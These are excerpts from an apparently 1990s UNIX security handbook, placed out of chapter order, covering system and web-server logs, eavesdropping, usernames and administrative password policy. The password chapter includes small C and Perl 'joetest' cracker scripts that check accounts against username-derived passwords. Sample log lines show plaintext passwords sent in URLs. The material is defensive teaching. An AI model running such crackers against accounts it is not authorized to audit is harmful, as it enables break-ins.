Jan 3 11:00:38 vineyard.net inetd[4411]: finger[4444] from 18.85.0.2 4599<br />

Jan 3 11:00:42 vineyard.net inetd[4411]: systat[4446] from 18.85.0.2 4600<br />

If your version of inetd does not support logging (and even if it does), consider using the tcpwrapper, discussed in<br />

Chapter 22, Wrappers and Proxies.<br />

10.3.7 Other Logs<br />

There are many other possible log files on <strong>UNIX</strong> systems that may result from third-party software. Usenet news<br />

programs, gopher servers, database applications, and many other programs often generate log files both to show usage<br />

and to indicate potential problems. The files should be monitored on a regular basis.<br />

As a suggestion, consider putting all these logs in the same directory. If you cannot do that, use a symbolic link from<br />


the log file's hard-coded location to the new log file in a common directory (assuming that your system supports symbolic links). This link will make it easier to write scripts that monitor the files and to keep track of the log files present on your system.

NOTE: Many systems have cron jobs which rotate the log files. If these scripts do not know about your<br />

symbolic links, you won't get what you expect! Instead of having your log files rotated, the symbolic link<br />

will be renamed and a new file created in its old place, rather than where the symbolic link pointed.<br />




Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.4 Avoiding the Risks of Eavesdropping<br />

The risks of eavesdropping affect all <strong>Internet</strong> protocols, but are of particular concern on the World Wide Web, where sensitive documents and other kinds of information, such as credit card numbers, may be transmitted. There are only two ways to protect information from eavesdropping. The<br />

first is to assure that the information travels over a physically secure network (which the <strong>Internet</strong> is not). The second is to encrypt the information so that it can only be decrypted by the intended recipient.<br />

Another form of eavesdropping that is possible is traffic analysis. In this type of eavesdropping, an attacker learns about the transactions performed by a target, without actually learning the content. As we will see below, the log files kept by Web servers are particularly vulnerable to this type<br />

of attack.<br />

18.4.1 Eavesdropping Over the Wire<br />

Information sent over the <strong>Internet</strong> must be encrypted to be protected from eavesdropping. There are four ways in which information sent by the Web can be encrypted:<br />

1. Link encryption. The long-haul telephone lines that are used to carry the IP packets can be encrypted. Organizations can also use encrypting routers to automatically encrypt information sent over the <strong>Internet</strong> that is destined for another office. Link encryption provides for the<br />

encryption of all traffic, but it can only be performed with prior arrangement. Link encryption has traditionally been very expensive, but new generations of routers and firewalls are being produced that incorporate this feature.<br />

2. Document encryption. The documents that are placed on the Web server can be encrypted with a system such as PGP. Although this encryption provides for effective privacy protection, it is cumbersome because it requires the documents to be specially encrypted before they are<br />

placed on the server and they must be specially decrypted when they are received.<br />

3. SSL (<strong>Sec</strong>ure Socket Layer). SSL is a system designed by Netscape Communications that provides an encrypted TCP/IP pathway between two hosts on the <strong>Internet</strong>. SSL can be used to encrypt any TCP/IP protocol, such as HTTP, TELNET, or FTP.<br />

SSL can use a variety of public-key and token-based systems for exchanging a session key. Once a session key is exchanged, it can use a variety of secret key algorithms. Currently, programs that use SSL that are distributed for anonymous FTP on the <strong>Internet</strong> and that are sold to<br />

international markets are restricted to using a 40-bit key, which should not be considered secure.<br />

A complete description of the SSL protocol can be found at the site http://home.netscape.com/newsref/std/SSL.html.<br />

4. SHTTP (Secure HTTP). Secure HTTP is an encryption system for HTTP designed by CommerceNet. SHTTP only works with HTTP.

A complete description of the SHTTP protocol can be found at http://www.eit.com/projects/s-http/.<br />

It is widely believed that most commercial Web servers that seek to use encryption will use either SSL or SHTTP. Unlike the other options above, both SSL and SHTTP require special software to be running on both the Web server and in the Web browser. This software will likely be in most<br />

commercial Web browsers within a few months after this book is published, although it may not be widespread in freely available browsers until the patents on public key cryptography expire within the coming years.<br />

When using an encrypted protocol, your security depends on several issues:<br />

● The strength of the encryption algorithm<br />

● The length of the encryption key<br />

● The secrecy of the encryption key<br />

● The reliability of the underlying software that is running on the Web server<br />

● The reliability of the underlying software that is running on the Web client<br />

During the summer of 1995, a variety of articles were published describing failures of the encryption system used by the Netscape Navigator. In the first case, a researcher in France was able to break the encryption key used on a single message by using a network of workstations and two<br />

supercomputers. The message had been encrypted with the international version of the Netscape Navigator using a 40-bit RC4 key. In the second case, a group of students at the University of California at Berkeley discovered a flaw in the random number generator used by the <strong>UNIX</strong>-based<br />

version of Navigator. [3] In the third case, the same group of students at Berkeley discovered a way to alter the binaries of the Navigator program as they traveled between the university's NFS server and the client workstation on which the program was actually running.[4]<br />

[3] The random number generator was seeded with a number that depended on the current time and the process number of the Navigator process.<br />

[4] The students pointed out that while they attacked the Navigator's binaries as they were moving from the server computer to the client, they could just as easily have attacked the program as it was being downloaded from an FTP site.

All of these attacks are highly sophisticated. Nevertheless, most of them do not seem to be having an impact on the commercial development of the Web. It is likely that within a few years the encryption keys will be lengthened to 64 bits. Netscape has improved the process by which its<br />

Navigator program seeds its random number generator. The third problem, of binaries being surreptitiously altered, will likely not be a problem for most users with improved software distribution systems that themselves use encryption and digital signatures.<br />

18.4.2 Eavesdropping Through Log Files<br />

Most Web servers create log files that record considerable information about each request. These log files grow without limit until they are automatically trimmed or until they fill up the computer's hard disk (usually resulting in a loss of service). By examining these files, it is possible to infer<br />

a great deal about the people who are using the Web server.<br />

For example, the NCSA httpd server maintains the following log files in its logs/ directory:<br />

access_log<br />

A list of the individual accesses to the server.<br />

agent_log<br />

A list of the programs that have been used to access the server.<br />

error_log<br />

A list of the errors that the server has experienced, whether generated by the server itself or by your CGI scripts. (Anything that a script prints to Standard Error is appended into this file.)<br />

refer_log<br />

This log file contains entries that include the URL that the browser previously visited and the URL that it is currently viewing.<br />

By examining the information in these log files, you can create a very comprehensive picture of the people who are accessing a Web server, the information that they are viewing, and where they have previously been.<br />


In Chapter 10, Auditing and Logging, we describe the fields that are stored in the access_log file. Here they are again:<br />

● The name of the remote computer that initiated the transfer
● The remote login name, if it was supplied, or "-" if not supplied
● The remote username, if supplied, or "-" if not supplied
● The time that the transfer was initiated (day of month, month, year, hour, minute, second, and time zone offset)
● The HTTP command that was executed (can be GET for receiving files, POST for processing forms, or HEAD for viewing the MIME header)
● The status code that was returned
● The number of bytes that were transferred

Here are a few lines from an access_log file:<br />

koriel.sun.com - - [06/Dec/1995:18:44:01 -0500] "GET /simson/resume.html HTTP/1.0" 200 8952<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:14 -0500] "GET /simson/ HTTP/1.0" 200 2749<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:15 -0500] "GET /icons/back.gif HTTP/1.0" 200 354<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:16 -0500] "GET /cgi-bin/counter?file=simson HTTP/1.0" 200 545<br />

piweba1y-ext.prodigy.com - - [06/Dec/1995:18:52:30 -0500] "GET /vineyard/history/" HTTP/1.0" 404 -<br />

As you can tell, there is a wealth of information here. Apparently, some user at Sun Microsystems is interested in Simson's resume. A user at the University of North Carolina also seems interested in Simson. And a Prodigy user appears to want information about the history of Martha's<br />

Vineyard.<br />

None of these entries in the log file contain the username of the person conducting the Web request. But they may still be used to identify individuals. It's highly likely that koriel.sun.com is a single SPARCstation sitting on a single employee's desk at Sun. We don't know what lawsta11.oitlabs.unc.edu is, but we suspect that it is a single machine in a library. Many organizations now give distinct IP addresses to individual users for use with their PCs, or for dial-in with PPP or SLIP. Without the use of a proxy server such as SOCKS (see Chapter 22) or systems that

rewrite IP addresses, Web server log files reveal those addresses.<br />

And there is more information to be "mined" as well. Consider the following entries from the refer_log file:<br />

http://www2.infoseek.com/NS/Titles?qt=unix-hater -> /unix-haters.html<br />

http://www.intersex.com/main/ezines.html -> /awa/<br />

http://www.jaxnet.com/~jdcarr/places.html -> /vineyard/ferry.tiny.gif<br />

In the first line, it's clear that a search on the InfoSeek server for the string "unix-hater" turned up the Web file /unix-haters.html on the current server. This is an indication that the user was surfing the Web looking for material having to do with UNIX. In the second line, a person who had been browsing the InterSex WWW server looking for information about electronic magazines followed a link to the /awa/ directory. This possibly indicates that the user is interested in content of a sexually oriented nature. In the last example, apparently a user, jdcarr@jaxnet.com, has embedded a link in his or her places.html file to a GIF file of the Martha's Vineyard ferry. This indicates that jdcarr is taking advantage of other people's network servers and Internet connections.

By themselves, these references can be amusing. But they can also be potentially important. Lincoln Stein and Bob Bagwill note in the World Wide Web <strong>Sec</strong>urity FAQ that a referral such as this one could indicate that a person is planning a corporate takeover:<br />

file://prez.xyz.com/hotlists/stocks2sellshort.html ->http://www.xyz.com<br />

The information in the refer_log can also be combined with information in the access_log to determine the names of the people (or at least their computers) who are following these links. Version 1.5 of the NCSA httpd Web server even has an option to store referrals in the access log.<br />

The access_log file contains the complete URL that was requested. For Web forms that use the GET method instead of the POST method, all of the arguments are included in the URL, and thus all of them end up in the access_log file.

Consider the following:<br />

asy2.vineyard.net - - [06/Oct/1995:19:04:37 -0400] "GET<br />

/cgi-bin/vni/useracct?username=bbennett&password=leonlikesfood&cun=jayd&fun=jay+Desmond&pun=766WYRCI&add1=box+634&add2=&city=Gay+Head&state=MA&zip=02535&phone=693-9766&choice=ReallyCreateUser<br />

HTTP/1.0" 200 292<br />

Or even this one:<br />

mac.vineyard.net - - [07/Oct/1995:03:04:30 -0400] "GET<br />

/cgi-bin/change-password?username=bbennett&oldpassword=dearth&newpassword=flabby3 HTTP/1.0" 200 400<br />

This is one reason why you should use the POST method in preference to the GET method!<br />

Finally, consider what can be learned from agent_log. Here are a few sample lines:<br />

NCSA_Mosaic/2.6 (X11;HP-UX A.09.05 9000/720) libwww/2.12 modified via proxy gateway CERN-HTTPD/3.0<br />

libwww/2.17<br />

NCSA_Mosaic/2.6 (X11;HP-UX A.09.05 9000/720) libwww/2.12 modified via proxy gateway CERN-HTTPD/3.0<br />

libwww/2.17<br />

Proxy gateway CERN-HTTPD/3.0 libwww/2.17<br />

Mozilla/1.1N (X11; I; OSF1 V3.0 alpha) via proxy gateway CERN-HTTPD/3.0 libwww/2.17<br />

Mozilla/1.2b1 (Windows; I; 16bit)<br />

In addition to the name of the Web browser that is being used, this file reveals information about the structure of an organization's firewall. It also reveals the use of beta software within an organization.<br />

Some servers allow you to restrict the amount of information that is logged. If you do not require information to be logged, you may wish to suppress the logging.<br />

In summary, users of the Web should be informed that their actions are being monitored. As many firms wish to use this information for marketing, it is quite likely that the amount of information that Web browsers provide to servers will, rather than decrease, increase in the future.<br />




Chapter 10<br />

Auditing and Logging<br />

10.2 The acct/pacct Process Accounting File<br />

In addition to logins and logouts, <strong>UNIX</strong> can log every single command run by every single user. This<br />

special kind of logging is often called process accounting; normally, process accounting is used only in<br />

situations where users are billed for the amount of CPU time that they consume. The acct or pacct file can be used after a break-in to help determine what commands a user executed (provided that the log file is not deleted). Process accounting can also be used for other purposes, such as seeing if anyone is using some old software you wish to delete, or finding out who is playing games on the fileserver.

The lastcomm or acctcom program displays the contents of this file in a human-readable format:<br />

% lastcomm<br />

sendmail F root __ 0.05 secs Sat Mar 11 13:28<br />

mail S daemon __ 0.34 secs Sat Mar 11 13:28<br />

send dfr __ 0.05 secs Sat Mar 11 13:28<br />

post dfr ttysf 0.11 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.09 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.23 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.02 secs Sat Mar 11 13:28<br />

anno dfr ttys1 0.14 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.03 secs Sat Mar 11 13:28<br />

mail S daemon __ 0.30 secs Sat Mar 11 13:28<br />

%<br />

If you have an intruder on your system and he has not edited or deleted the /var/adm/acct file, lastcomm<br />

will provide you with a record of the commands that the intruder used.[5] Unfortunately, <strong>UNIX</strong> accounting<br />

does not record the arguments to the command typed by the intruder, nor the directory in which the<br />

command was executed. Thus, keep in mind that a program named vi and executed by a potential intruder<br />

might actually be a renamed version of cc - you have no way to tell for certain by examining this log file.<br />

[5] lastcomm can be used in two ways: by the system administrator to monitor attackers, or by an attacker to see if the administrator is monitoring him. For this reason, some administrators change the permission mode of the log file so that only the superuser can read its contents.

On systems that have even moderate use, the /var/adm/acct file grows very quickly - often more than one or<br />

two megabytes per day. For this reason, most sites that use accounting run the command sa or runacct on a<br />

nightly basis. The command processes the information in the acct or pacct file into a summary file, which is<br />

often kept in /var/adm/savacct.<br />


10.2.1 Accounting with System V<br />

On SVR4 systems, you start the accounting with the command:<br />

# /usr/lib/acct/startup<br />

The accounting file on these systems is usually /var/adm/pacct and it is read with the acctcom command.<br />

The acctcom command has more than 20 options, and can provide a variety of interesting summaries. You<br />

should check your manual entry to become familiar with the possibilities.<br />

Accounting is performed by the <strong>UNIX</strong> kernel. Every time a process terminates, the kernel writes a 32-byte<br />

record to the /var/adm/acct file that includes:<br />

● Name of the user who ran the command
● Name of the command
● Amount of CPU time used
● Time that the process exited
● Flags, including:

    S   Command was executed by the superuser.
    F   Command ran after a fork, but without an exec.
    D   Command generated a core file when it exited.
    X   Command was terminated by a signal.

10.2.2 Accounting with BSD<br />

You can turn on accounting by issuing the accton command:<br />

# accton filename<br />

Depending on your version of UNIX, you may find the accton command in /usr/etc or in /usr/lib/acct. The filename specifies where accounting information should be kept. It is typically /var/adm/acct. The file is read with the lastcomm command.

Back Up Your Logs!<br />

Log files are a valuable resource. For this reason, many sites set up jobs in their crontab files to back up the<br />

logs every day.<br />

One way to back up your logs is to back up each log one file at a time. At one site, seven days' worth of the log file /usr/spool/mqueue/syslog are automatically kept in the files syslog.1, syslog.2, syslog.3 ... syslog.7.

Other sites set up shell scripts that automatically back up their log files and compress the backups.<br />

A simple way to back up your log is to have a shell script that runs every night and uses the tar command to<br />

archive your entire /var/adm directory, then uses the compress command to shorten the resulting output file.<br />

The following script could run at midnight each night and make the appropriate backups into<br />

/var/adm.backups:<br />

#!/bin/ksh
BFILE=$(date +backup.%y.%m.%d.tar.Z)
cd /var/adm
tar cf - . | compress > ../adm.backups/$BFILE
exit 0

10.2.3 messages Log File<br />

Many versions of <strong>UNIX</strong> place a copy of any message printed on the system console in a file called<br />

/usr/adm/messages or /var/adm/messages. This can be particularly useful, as it does not require the use of<br />

special software for logging - only a call to printf in a C program or an echo statement in a shell script.<br />

Here is a sample of the /var/adm/messages file from a computer running SunOS version 4.1:<br />

Mar 14 14:30:58 bolt su: 'su root' succeeded for tanya on /dev/ttyrb<br />

Mar 14 14:33:59 bolt vmunix: /home: file system full<br />

Mar 14 14:33:59 bolt last message repeated 8 times<br />

Mar 14 14:33:59 bolt vmunix: /home: file system full<br />

Mar 14 14:33:59 bolt last message repeated 16 times<br />

As you can see, the computer bolt is having a problem with a filled disk.<br />




Chapter 3<br />

3. Users and Passwords<br />

Contents:<br />

Usernames<br />

Passwords<br />

Entering Your Password<br />

Changing Your Password<br />

Verifying Your New Password<br />

The Care and Feeding of Passwords<br />

One-Time Passwords<br />

Summary<br />

This chapter explains the <strong>UNIX</strong> user account and password systems. It also discusses what makes a good<br />

password.<br />

Good password security is part of your first line of defense against system abuse.[1] People trying to gain unauthorized access to your system often try to guess the passwords of legitimate users. Two

common and related ways to do this are by trying many possible passwords from a database of common<br />

passwords, and by stealing a copy of your organization's password file and trying to crack the encrypted<br />

passwords that it contains.<br />

[1] Another part of your first line of defense is physical security, which may prevent an<br />

attacker from simply carting your server through the lobby without being questioned. See<br />

Chapter 12, Physical <strong>Sec</strong>urity for details.<br />

After an attacker gains initial access, he or she is free to snoop around, looking for other security holes to<br />

exploit to attain successively higher privileges. The best way to keep your system secure is to keep<br />

unauthorized users out of the system in the first place. This means teaching your users what good<br />

password security means and making sure they adhere to good security practices.<br />

Sometimes even good passwords aren't sufficient. This is especially true in cases where passwords need<br />

to travel across unprotected networks. With default network protocols and defenses, these passwords<br />

may be sniffed - read from the network by someone not authorized to know the passwords. In cases of<br />

this kind, one-time passwords are necessary.<br />


3.1 Usernames<br />

Every person who uses a <strong>UNIX</strong> computer should have an account. An account is identified by a<br />

username. Traditionally, each account also has a secret password associated with it to prevent<br />

unauthorized use. Usernames are sometimes called account names. You need to know both your<br />

username and your password to log into a <strong>UNIX</strong> system. For example, Rachel Cohen has an account on<br />

her university's computer system. Her username is rachel. Her password is "Iluvfred." When she wants to<br />

log into the university's computer system, she types:<br />

login: rachel<br />

password: Iluvfred<br />

The username is an identifier: it tells the computer who you are. The password is an authenticator: you<br />

use it to prove to the operating system that you are who you claim to be.<br />

Standard <strong>UNIX</strong> usernames may be between one and eight characters long. Within a single <strong>UNIX</strong><br />

computer, usernames must be unique: no two users can have the same one. (If two people did have the<br />

same username, then they would really be sharing the same account.) <strong>UNIX</strong> passwords are also between<br />

one and eight characters long, although some commercial <strong>UNIX</strong> systems now allow longer passwords.<br />

Longer passwords are usually more secure because they are harder to guess. More than one user can<br />

theoretically have the same password, although if they do, that indicates that both users have picked a<br />

bad password.<br />

A single person can have more than one <strong>UNIX</strong> account on the same computer. In this case, each account<br />

would have its own username. A username can be any sequence of characters you want (with some<br />

exceptions), and does not necessarily correspond to a real person's name.<br />

NOTE: Some versions of <strong>UNIX</strong> have problems with usernames that do not start with a<br />

lowercase letter or that contain special characters such as punctuation or control characters.<br />

Usernames containing certain unusual characters will also cause problems for various<br />

application programs, including some network mail programs. For this reason, many sites<br />

allow only usernames that contain lowercase letters and numbers and that start with a<br />

lowercase letter.<br />

Your username identifies you to <strong>UNIX</strong> the same way your first name identifies you to your friends.<br />

When you log into the <strong>UNIX</strong> system, you tell it your username the same way you might say, "Hello, this<br />

is Sabrina," when you pick up the telephone.[2] When somebody sends you electronic mail, they send it<br />

addressed with your username. For this reason, organizations that have more than one computer often<br />

require people to have the same username on every machine, primarily to minimize confusion with<br />

electronic mail.<br />

[2] Even if you aren't Sabrina, saying that you are Sabrina identifies you as Sabrina. Of<br />

course, if you are not Sabrina, your voice will probably not authenticate you as Sabrina,<br />

provided that the person you are speaking with knows what Sabrina sounds like.<br />

There is considerable flexibility in choosing a username. For example, John Q. Random might have any<br />

of the following usernames; they are all potentially valid:<br />

john johnqr johnr jqr jqrandom jrandom random randomjq<br />


Alternatively, John might have a username that appears totally unrelated to his real name, like avocado<br />

or t42. Having a username similar to your own name is merely a matter of convenience.<br />

Most organizations require that usernames be at least three characters long. Usernames that are only one<br />

or two characters are valid, but they are usually discouraged. Single-character usernames are simply too<br />

confusing for most people to deal with, no matter how easy you might think it would be to be user "i" or<br />

"x". Usernames that are two characters long are easily confused between different sites: is<br />

mg@unipress.com the same person as mg@aol.com? Names with little intrinsic meaning, such as t42<br />

and xp9uu6wl, can also cause confusion, because they are more difficult for correspondents to remember.<br />

Some organizations assign usernames consisting of a person's last name (sometimes with an optional<br />

initial). Other organizations let users pick their own names. A few organizations and online services<br />

assign an apparently random string of characters as the usernames, although this is not often popular with<br />

users or their correspondents: user xp9uu6wl may get quite annoyed at continually getting mail<br />

misaddressed for xp9uu6wi, assuming that anyone can remember either username at all.<br />

<strong>UNIX</strong> also has special accounts which are used for administrative purposes and special system functions.<br />

These accounts are not normally used by individual users, as you will see shortly.<br />




Chapter 8<br />

Defending Your Accounts<br />

8.8 Administrative Techniques for Conventional Passwords<br />

If you're a system administrator and you are stuck using conventional <strong>UNIX</strong> passwords, then you will find this section helpful. It<br />

describes a number of techniques that you can use to limit the danger of conventional passwords on your computer.<br />

8.8.1 Assigning Passwords to Users<br />

Getting users to pick good passwords can be very difficult. You can tell users horror stories and you can threaten them, but some<br />

users will always pick easy-to-guess passwords. Because a single user with a bad password can compromise the security of the<br />

entire system, some <strong>UNIX</strong> administrators assign passwords to users directly rather than letting users choose their own.<br />

To prevent users from changing their own passwords, all that you have to do is to change the permissions on the /bin/passwd<br />

program that changes people's passwords.[14] Making the program executable only by people in the staff group, for example, will<br />

still allow staff members to change their own passwords, but will prevent other people from doing so:<br />

[14] This technique requires changing permissions on any other password-changing software, such as yppasswd and<br />

nispasswd.<br />

# chgrp staff /bin/passwd<br />

# chmod 4750 /bin/passwd<br />

Use this approach only if staff members are available 24 hours a day. Otherwise, if a user discovers that someone has been using<br />

her account, or if she accidentally discloses her password, the user is powerless to safeguard the account until she has contacted<br />

someone on staff.<br />

Some versions of <strong>UNIX</strong> may have an administrator command that will allow you to prevent selected users from changing their<br />

passwords.[15] Thus, you do not need to change the permissions on the passwd program. You only need to disable the capability<br />

for those users who cannot be trusted to set good passwords on their own.<br />

[15] On AIX, the root user can prevent ordinary users from changing their passwords by running the following:<br />

pwdadm -f ADMIN user or by editing /etc/security/passwd.<br />

In SVR4 UNIX, for example, you can prevent a user from changing her password by setting the aging parameters appropriately (we discuss password aging in a few more pages). To prevent Kevin from changing his password, you might use the command:

# passwd -n 60 -x 50 kevin<br />

Note, however, that Kevin's password will expire in 50 days and will need to be reset by someone with superuser access.<br />

8.8.2 Constraining Passwords<br />

You can easily strengthen the passwd program to disallow users from picking easy-to-guess passwords - such as those based on<br />

the user's own name, other accounts on the system, or on a word in the <strong>UNIX</strong> dictionary. So far, however, many <strong>UNIX</strong> vendors<br />

have not made the necessary modifications to their software. There are some freeware packages available on the net, including<br />

npasswd and passwd+, which can be used for this purpose; both are available at popular FTP archives, including<br />

coast.cs.purdue.edu. Another popular system is anlpasswd, which has some advantages over npasswd and passwd+, and can be<br />

found at info.mcs.anl.gov.<br />

Some versions of <strong>UNIX</strong>, most notably the Linux operating system, come supplied with npasswd. Other vendors would do well to<br />

follow this example.<br />


An approach that is present in many versions of <strong>UNIX</strong> involves putting constraints on the passwords that users can select.<br />

Normally, this approach is controlled by some parameters accessed through the system administration interface. These settings<br />

allow the administrator to set the minimum password length, the number of nonalphabetic characters allowed, and so on. You<br />

might even be able to specify these settings per user, as well as per system.<br />

One <strong>UNIX</strong> system that combines all these features in addition to password aging is AIX. By editing the security profile via the<br />

smit management tool, the administrator can set any or all of the following for all users or individually for each user (IBM's<br />

recommended settings are given for each):<br />

● The minimum and maximum age of passwords, in weeks (0, 12)
● The number of days of warning to give before expiring a password (14)
● The minimum length of the new password (6)
● The minimum number of alphabetic and non-alphabetic characters that must be present in the new password (1, 1)
● The maximum number of repeated characters allowed in the new password (3)
● The minimum number of characters that must be different from those in the previous password (3)
● The number of weeks before a password can be used again (26)
● The number of new passwords that must be selected and used before an old password can be used again (8)
● The name of a file of prohibited words that cannot be selected as passwords
● A list of programs that can be run to check the password choice for acceptability

This list is the most comprehensive group of "settable" password constraints that we have seen. If you are using traditional<br />

passwords, having (and properly using!) options such as these can significantly improve the security of your passwords.<br />

8.8.3 Cracking Your Own Passwords<br />

A less drastic approach than preventing users from picking their own passwords is to run a program periodically to scan the<br />

/etc/passwd file for users with passwords that are easy to guess. Such programs, called password crackers, are (unfortunately?)<br />

identical to the programs that bad guys use to break into systems. The best of these crackers is a program called Crack. (We tell<br />

you in Appendix E, where to get it.) If you don't (or can't) use shadow password files, you definitely want to get and use the Crack<br />

program on your password file...because one of your users or an attacker will most certainly do so.<br />

NOTE: Before you run a password cracker on your system, be sure that you are authorized to do so. You may wish<br />

to get the authorization in writing. Running a password cracker may give the impression that you are attempting to<br />

break into a particular computer. Unless you have proof that you were authorized to run the program, you may find<br />

yourself facing unpleasant administrative actions or possibly even prosecution for computer crime.<br />

8.8.3.1 Joetest: a simple password cracker<br />

To understand how a password-cracking program works, consider this program, which simply scans for accounts that have the<br />

same password as their username. From Chapter 3, remember that such accounts are known as "Joes." The program must be run as<br />

root if you have shadow password files installed on your system:<br />

Example 8.1: Simple Password Cracker

/*
 * joetest.c:
 *
 * Scan for "joe" accounts -- accounts with the same username
 * and password.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>

int main(int argc, char **argv)
{
    struct passwd *pw;
    char *crypt();
    char *result;

    while ((pw = getpwent()) != NULL) {
        result = crypt(pw->pw_name, pw->pw_passwd);
        if (!strcmp(result, pw->pw_passwd)) {
            printf("%s is a joe\n", pw->pw_name);
        }
    }
    exit(0);
}

To show you the advantages of the Perl programming language, we have rewritten this program:<br />

#!/usr/local/bin/perl<br />

#<br />

# joetest<br />

#<br />

while (($name,$passwd) = getpwent) {<br />

print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);<br />

}<br />

To further demonstrate the power of Perl, consider the following script, which only runs under Perl5:<br />

#!/usr/local/bin/perl<br />

#<br />

# super joetest<br />

#<br />

while (($name,$passwd) = getpwent) {<br />

print "$name has no password\n" if !$passwd;<br />

print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);<br />

print "$name is a JOE\n" if (crypt(uc($name), $passwd) eq $passwd);<br />

print "$name is a Joe\n" if (crypt(ucfirst($name), $passwd)<br />

eq $passwd);<br />

print "$name is a eoj\n" if (crypt(scalar reverse $name, $passwd)<br />

eq $passwd);<br />

}<br />

If you have the time, type in the above program and run it. You might be surprised to find a Joe or two on your system. Or simply<br />

get Crack, which will scan for these possibilities, and a whole lot more.<br />

8.8.3.2 The dilemma of password crackers<br />

Because password crackers are used both by legitimate system administrators and computer criminals, they present an interesting<br />

problem: if you run the program, a criminal might find its results and use them to break into your system! And, if the program<br />

you're running is particularly efficient, it may be stolen and used against you. Furthermore, the program you're using could always<br />

have more bugs or have been modified so that it doesn't report some bad passwords that may be present: instead, such passwords<br />

might be silently sent by electronic mail to an anonymous repository in Finland.<br />

Instead of running a password cracker, you should prevent users from picking bad passwords in the first place. Nevertheless, this<br />

goal is not always reachable. For this reason, many system administrators run password crackers on a regular basis. If you run a<br />

program like Crack and find a bad password, you should disable the account immediately, because an attacker could also find it.<br />

NOTE: If you run a password cracker and don't find any weak passwords, you shouldn't assume that there are none<br />

to find! You might not have as extensive a set of dictionaries as the people working against you: while your program<br />


reports no weak passwords found, outsiders might still be busy logging in using cracked passwords found with their<br />

Inuit, Basque, and Middle Druid dictionaries. Or an attacker may have booby-trapped your copy of Crack, so that<br />

discovered passwords are not reported but are sent to a computer in New Zealand for archiving. For these reasons,<br />

use password cracking in conjunction with user education, rather than as an alternative to it.<br />

8.8.4 Password Generators<br />

Under many newer versions of <strong>UNIX</strong>, you can prevent users from choosing their own passwords altogether. Instead, the passwd<br />

program runs a password generator that produces pronounceable passwords. To force users to use the password generator under<br />

some versions of System V <strong>UNIX</strong>, you select the "Accounts Defaults Passwords" menu from within the sysadmsh<br />

administrative program.<br />

Most users don't like passwords that are generated by password generators: despite claims of the program's authors, the passwords<br />

really aren't that easy to remember. Besides, most users would much rather pick a password that is personally significant to them.<br />

Unfortunately, these passwords are also the ones that are easiest to guess.<br />

Two more problems with generated passwords are that users frequently write them down to remember them, and that the<br />

password generator programs themselves can be maliciously modified to generate "known" passwords.<br />

There are several freely available password generators that you can download and install on your system. The mkpasswd program<br />

by Don Libes is one such program, and it can be found in most of the online archives mentioned in Appendix E.<br />
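To see the idea behind pronounceable-password generators, here is a toy sketch in Perl that strings together random consonant-vowel pairs. It is only an illustration: its output space is small and its random-number seeding is weak, so use a real generator such as mkpasswd for actual accounts.

#!/usr/local/bin/perl
#
# toypass: print a "pronounceable" eight-character password by
# alternating consonants and vowels.  This only illustrates how such
# generators work -- the result has far less randomness than it looks,
# so do not use it for real accounts.
#
srand(time() ^ ($$ + ($$ << 15)));           # seed the (weak!) generator
@c = split(//, "bcdfghjklmnprstvwz");        # consonants
@v = split(//, "aeiou");                     # vowels

$password = "";
for ($i = 0; $i < 4; $i++) {
    $password .= $c[int(rand(@c))] . $v[int(rand(@v))];
}
print "$password\n";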

Instead of using password generators, you may want to install password "advisors" - programs that examine user choices for<br />

passwords and inform the users if the passwords are weak. There are commercial programs that do this procedure, such as<br />

password coach by Baseline Software, and various freeware and shareware filters such as passwd+. In general, these products may<br />

do comparisons against dictionaries and heuristics to determine if the candidate password is weak. However, note that these<br />

products suffer from the same set of drawbacks as password crackers - they can be modified to secretly record the passwords, and<br />

their knowledge base may be smaller than that used by potential adversaries. If you use an "advisor," don't be complacent!<br />
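The following Perl sketch shows the flavor of the checks such an advisor performs. It applies only a handful of heuristics and assumes a word list at /usr/dict/words (a location that varies between systems); real filters such as passwd+ are far more thorough.

#!/usr/local/bin/perl
#
# advise: apply a few simple heuristics to a candidate password.
# This is only a sketch of the kind of tests an "advisor" runs; a real
# filter uses many more tests and much larger dictionaries.  The
# dictionary location is an assumption -- adjust it for your system.
# (In real life you would not pass a password on the command line,
# where ps can see it.)
#
($user, $candidate) = @ARGV;
die "usage: advise username password\n" unless defined $candidate;

push(@complaints, "it is shorter than 6 characters")
    if length($candidate) < 6;
push(@complaints, "it is based on your username")
    if index(lc($candidate), lc($user)) >= 0;
push(@complaints, "it contains no non-alphabetic characters")
    if $candidate !~ /[^A-Za-z]/;

if (open(DICT, "/usr/dict/words")) {
    while (<DICT>) {
        chomp;
        if (lc($_) eq lc($candidate)) {
            push(@complaints, "it is in the dictionary");
            last;
        }
    }
    close(DICT);
}

if (@complaints) {
    print "This would be a weak password because:\n";
    print "\t$_\n" for @complaints;
} else {
    print "No obvious problems found (but don't be complacent!).\n";
}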

8.8.5 Shadow Password Files<br />

When the <strong>UNIX</strong> password system was devised, the simple security provided by the salt was enough. Computers were slow (by<br />

present standards), and hard disks were small. At the rate of one password encryption per second, the system would have taken<br />

three years and three months to encrypt the entire 25,000-word <strong>UNIX</strong> spelling dictionary with every one of the 4096 different<br />

salts. Simply holding the database would require more than 10 gigabytes of storage - well beyond the capacity of typical <strong>UNIX</strong><br />

platforms.<br />
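If you want to check the arithmetic behind that time estimate, it takes only a few lines of Perl:

#!/usr/local/bin/perl
#
# How long does it take to encrypt a 25,000-word dictionary with every
# one of the 4,096 possible salts at one encryption per second?
#
$encryptions = 25_000 * 4_096;                    # 102,400,000
$seconds_per_year = 365.25 * 24 * 60 * 60;
printf "%d encryptions = about %.1f years\n",
       $encryptions, $encryptions / $seconds_per_year;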

The advantage to a computer criminal of such a database, however, would be immense. Such a database would reduce the time to<br />

do an exhaustive key search for a password from seven hours to a few seconds. Finding accounts on a computer that had weak<br />

passwords would suddenly become a simple matter.<br />

Today, many of the original assumptions about the difficulty of encrypting passwords have broken down. For starters, the time<br />

necessary to calculate an encrypted password has shrunk dramatically. Modern workstations can perform up to several thousand<br />

